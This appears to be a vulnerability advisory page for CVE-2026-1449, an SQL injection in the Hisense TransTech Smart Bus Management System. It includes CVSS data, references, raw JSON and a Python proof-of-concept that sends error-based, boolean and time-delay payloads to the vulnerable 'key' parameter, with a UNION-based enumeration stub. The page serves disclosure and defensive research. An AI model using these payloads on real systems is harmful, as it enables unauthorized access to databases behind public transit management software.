Security Vulnerability Report
CVE-2026-1449 (CVSS 7.3, HIGH)

Published: 2026-01-27 00:15:51
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Hisense TransTech Smart Bus Management System up to 20260113. Affected is the function Page_Load of the file YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx. Executing a manipulation of the argument key can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available for this record. The affected product, as stated in the description, is:

Hisense TransTech Smart Bus Management System <= 20260113

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-1449 SQL Injection PoC
# Target: Hisense TransTech Smart Bus Management System
# Vulnerability: Page_Load function in TireMng.aspx with unsanitized 'key' parameter
import requests
import sys

target_url = "http://target-server/YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx"

# Basic SQL Injection test - error-based injection
payload_error = "' OR 1=1 --"
# Boolean-based blind injection test
payload_boolean = "' AND 1=1 --"
# Time-based blind injection test
payload_time = "'; WAITFOR DELAY '0:0:5' --"


def test_sqli(url, payload):
    """Test SQL injection vulnerability"""
    params = {'key': payload}
    try:
        response = requests.get(url, params=params, timeout=30)
        print(f"[+] Sent payload: {payload}")
        print(f"[+] Status code: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


# Database enumeration using UNION-based injection
def enumerate_database(url):
    """Enumerate database information (left as a stub in the published PoC)"""
    # Determine number of columns via ORDER BY
    for i in range(1, 20):
        payload = f"' ORDER BY {i} --"
        # Implementation for column enumeration
    # UNION-based data extraction
    union_payload = "' UNION SELECT NULL,NULL,NULL,NULL,@@version--"
    # Extract database version, user, database name


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print("[*] Testing CVE-2026-1449 SQL Injection")
    print(f"[*] Target: {target_url}")
    # Test different injection techniques
    test_sqli(target_url, payload_error)
    test_sqli(target_url, payload_boolean)
    test_sqli(target_url, payload_time)
```

References

Weaknesses: CWE-74, CWE-89

- https://github.com/master-abc/cve/issues/15
- https://vuldb.com/?ctiid.342881
- https://vuldb.com/?id.342881
- https://vuldb.com/?submit.737032

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-1449",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-27T00:15:50.790",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A flaw has been found in Hisense TransTech Smart Bus Management System up to 20260113. Affected is the function Page_Load of the file YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx. Executing a manipulation of the argument key can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."},
      {"lang": "es", "value": "Se ha encontrado una falla en el sistema de gestión de autobuses inteligentes Hisense TransTech hasta el 20260113. Afectada es la función Page_Load del archivo YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx. La ejecución de una manipulación del argumento key puede llevar a inyección SQL. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "baseScore": 7.5,
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "NONE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "HIGH",
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/master-abc/cve/issues/15", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.342881", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.342881", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.737032", "source": "[email protected]"}
    ]
  }
}
```